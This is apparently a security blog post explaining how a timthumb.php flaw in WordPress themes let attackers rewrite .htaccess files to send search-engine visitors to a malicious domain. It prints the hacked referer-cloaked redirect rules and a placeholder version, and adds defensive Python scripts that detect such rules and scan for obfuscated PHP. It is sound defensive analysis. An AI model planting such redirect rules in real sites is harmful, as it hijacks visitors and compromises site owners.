Google search results poisoning or WordPress vulnerability?

A visitor brought to my attention a weird fact: when searching in Google for “social bookmarking sites” or “social bookmarking sites 2011”, www.socialbookmarkingsiteslist.com appears on the first results page:

[Screenshot: hacked-website.jpg]


Clicking on this result takes us not to the expected website, which is supposed to contain a list of the most important social bookmarking sites, but to http://sokoloperkovuskeci.com/in.php?g=193. The visitor who told me about this issue suggested that it is another case of search results poisoning, and a quick Google search for similar problems confirmed that this is exactly the case here: Google search results poisoning through a vulnerability found in some WordPress themes.

Many other users reported similar problems with their websites, but only when arriving from a search engine by clicking on a search result; otherwise the websites load normally. The culprit appears to be a vulnerability in timthumb.php, a component of some WordPress themes used to generate thumbnails. According to Mark Maunder, who first discovered this vulnerability, an unpatched timthumb.php file allows execution of arbitrary code in the timthumb cache directory and can be used to inject code into other legitimate WordPress PHP files. The consequences can be disastrous: malicious shell code can be uploaded and executed, or the .htaccess file can be modified, leading to malicious redirects, as in the case studied here.

.htaccess is a configuration file used by Apache web servers to manage security restrictions and other settings at directory level: each directory on an Apache web server can contain a .htaccess file, which overrides the global web server configuration for that specific directory.

Using the .htaccess file we can enable the mod_rewrite engine on an Apache web server, allowing us to redirect visitors wherever we want. Example of usage:

RewriteEngine on
# In a .htaccess file the per-directory prefix is stripped before matching,
# so the pattern carries no leading slash
RewriteRule ^foo\.html$ bar.html [R]

You can see more usages of the .htaccess file here. The conclusion is that if somebody modifies the .htaccess file in the root directory of a website, they can redirect users to another website, and this is exactly what happened in the malicious redirect discussed in this article. Searching with Google we can see that more and more webmasters and ordinary Internet users report this problem; see the digitalpoint.com forum or the WordPress support forum, where a user discussed this situation and posted the hacked .htaccess file:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http : // sokoloperkovuskeci . com / in . php ? g = 56 [R,L]
</IfModule>

Another interesting fact can be seen here: visitors are redirected only if they arrive from a search engine, that is, if the referer is a search engine (Google, Yahoo, Ask, MSN); this is the rewrite condition. If you simply type the URL of a hacked website into the browser address bar and navigate there, no redirection is performed.
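That referer condition is exactly what a site owner should look for when auditing a .htaccess file, because a normal visit from the address bar will never reveal the redirect. The following script is an added example written for this post, not code from the forum thread, from WordPress or from Apache: it parses RewriteCond/RewriteRule pairs and flags any rule that sends visitors to a host outside the site only when %{HTTP_REFERER} matches. The embedded .htaccess sample is constructed after the one posted above, with the placeholder host attacker.example standing in for the real redirect target, and www.example.com is an assumed legitimate hostname for the site being checked.

```python
"""Flag referer-conditional off-site redirects in an Apache .htaccess file.

Added example for this post (not code from the forum thread or from Apache).
Usage: python check_htaccess.py [/path/to/.htaccess]  (defaults to the sample).
"""
import re
import sys
from urllib.parse import urlparse

# Referer substrings used by the hacked file above, lowercased for matching.
SEARCH_ENGINE_MARKERS = ("google", "bing", "search.yahoo", "ask.com", "msn",
                         "live.com", "aol.com", "altavista", "excite")

# RewriteCond <TestString> <CondPattern> [flags]
# RewriteRule <Pattern> <Substitution> [flags]
COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)

# Constructed sample modelled on the .htaccess posted in the forum thread; the
# redirect target is a placeholder host, not the real malicious domain.
SAMPLE_HTACCESS = r"""<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://attacker.example/in.php?g=56 [R,L]
# Benign: hotlink protection also keys on the referer but does not leave the site
RewriteCond %{HTTP_REFERER} !^$ [NC]
RewriteCond %{HTTP_REFERER} !www.example.com [NC]
RewriteRule \.(jpg|png)$ - [F]
# Benign: internal redirect with no referer condition at all
RewriteRule ^old\.html$ new.html [R]
</IfModule>
"""


def _is_external_redirect(flags):
    """True when the rule's flag list carries R or R=code (an HTTP redirect)."""
    return any(f.strip().upper().split("=")[0] == "R" for f in flags.split(","))


def find_referer_redirects(htaccess_text, own_hosts):
    """Return one finding per RewriteRule whose target is a host outside own_hosts
    and which is guarded by at least one RewriteCond on %{HTTP_REFERER}."""
    own_hosts = {h.lower() for h in own_hosts}
    findings = []
    pending = []  # RewriteCond lines apply to the next RewriteRule only
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = COND_RE.match(line)
        if m:
            pending.append((lineno, m.group(1), m.group(2)))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), (m.group(3) or "")
        guard, pending = pending, []  # this rule consumes the pending conditions
        referer_conds = [c for c in guard if "%{HTTP_REFERER}" in c[1].upper()]
        host = urlparse(target).hostname if "://" in target else None
        if not referer_conds or host is None or host.lower() in own_hosts:
            continue
        engines = sorted({mk for _, _, pattern in referer_conds
                          for mk in SEARCH_ENGINE_MARKERS if mk in pattern.lower()})
        findings.append({
            "line": lineno,
            "target_host": host,
            "referer_conditions": len(referer_conds),
            "search_engines": engines,
            "external_redirect": _is_external_redirect(flags),
        })
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HTACCESS
    for f in find_referer_redirects(text, {"www.example.com"}):
        print(f"line {f['line']}: referer-conditional redirect to {f['target_host']} "
              f"(search engines matched: {', '.join(f['search_engines']) or 'none'})")
```

Run against the sample it reports only the rule on line 8; the hotlink-protection block is also keyed on the referer but never leaves the site, and the plain internal redirect has no referer condition, so neither is flagged. A finding with an empty search-engine list still deserves a look, since the condition could key on any other referer.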

If you run a WordPress site with a theme that uses timthumb.php (if your theme uses thumbnails, chances are you have this file), it is more than recommended to replace it with the new patched version, which can be found here. The website must also be investigated for strange behaviour or modified PHP files.
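To act on that advice (find every copy of timthumb.php, read its version, and look for PHP files that were changed or planted), here is an added audit script written for this post; it is not part of WordPress or of timthumb. It assumes that timthumb.php declares its version in a define ('VERSION', '...') line, that the script is sometimes shipped under the name thumb.php, and that thumbnails are kept in a directory named cache; the eval(base64_decode(...)) pattern is a coarse heuristic for common obfuscation wrappers, a hint to inspect the file rather than proof of compromise. Compare the reported version against the patched release linked above.

```python
"""Audit a WordPress tree for timthumb.php copies and recently changed PHP files.

Added example for this post, not code from WordPress or timthumb. Assumptions:
timthumb.php declares its version as  define ('VERSION', '...');  it may be
shipped as thumb.php; and its thumbnails live in a directory named `cache`.
Usage: python audit_wp.py [/path/to/wordpress]  (defaults to the current dir).
"""
import os
import re
import sys
import time

VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")
# Common obfuscation wrappers seen in injected PHP; a coarse heuristic, not proof.
SUSPICIOUS_RE = re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)


def timthumb_version(path):
    """Read the VERSION define near the top of a timthumb.php copy."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        head = fh.read(4096)
    m = VERSION_RE.search(head)
    return m.group(1) if m else "unknown"


def audit_tree(root, modified_since):
    """Walk root and return a report dict with four lists:
      timthumb:   (path, version) for every timthumb.php / thumb.php copy
      cache_php:  PHP files sitting inside a directory named cache (thumbnails
                  never need PHP, so any script there is a red flag)
      recent_php: PHP files whose mtime is after modified_since (epoch seconds)
      suspicious: PHP files containing an eval(base64_decode/gzinflate(...)) wrapper
    """
    report = {"timthumb": [], "cache_php": [], "recent_php": [], "suspicious": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            if name.lower() in ("timthumb.php", "thumb.php"):
                report["timthumb"].append((path, timthumb_version(path)))
            if os.path.basename(dirpath).lower() == "cache":
                report["cache_php"].append(path)
            if os.path.getmtime(path) > modified_since:
                report["recent_php"].append(path)
            with open(path, "rb") as fh:
                if SUSPICIOUS_RE.search(fh.read().decode("latin-1")):
                    report["suspicious"].append(path)
    return report


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    since = time.time() - 7 * 86400  # look back one week by default
    for key, items in audit_tree(root, since).items():
        print(f"{key}: {len(items)}")
        for item in items:
            print("   ", item)
```

The modification-time check is only useful if you have a baseline (the date of the last legitimate theme or core update), and an attacker who has write access can reset timestamps, so treat an empty recent_php list as weak evidence; the cache_php and suspicious lists are the ones worth opening by hand.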

The scary thing is that there are indications that this vulnerability was exploited for some time by hackers motivated, as always, by financial returns. Hacked websites lost their traffic for a while and were in a position to be totally compromised by malicious scripts (shells) uploaded and executed on their web servers. We can easily imagine the methods used by hackers to make money from this vulnerability; one is to steal traffic (visitors) and redirect it to their ads.

But what about the final target of this malicious redirect, http://sokoloperkovuskeci.com?

Well, a simple domain lookup reveals malformed (apparently fake) registrant details:

Registrant Contact:
NA
Robert Duval admin@sokoloperkovuskedi.com
+15709877322 fax: +15709877322
1105 Nw 22nd Ave
Miami Florida 54353
us

……………………………………………………

DNS:
ns1.hoperjoper.ru
ns2.hoperjoper.ru


Even though the domain in question is sokoloperkovuskeci.com, the admin contact is at sokoloperkovuskedi.com; note the one-letter difference.

I will try to contact the www.socialbookmarkingsiteslist.com webmaster; perhaps he does not even know that his website was hacked, but it is hard to reach him because the domain registration details are private. If you run a WordPress based website, I urge you to check it for this vulnerability.

Keep safe!

Posted in Thoughts.
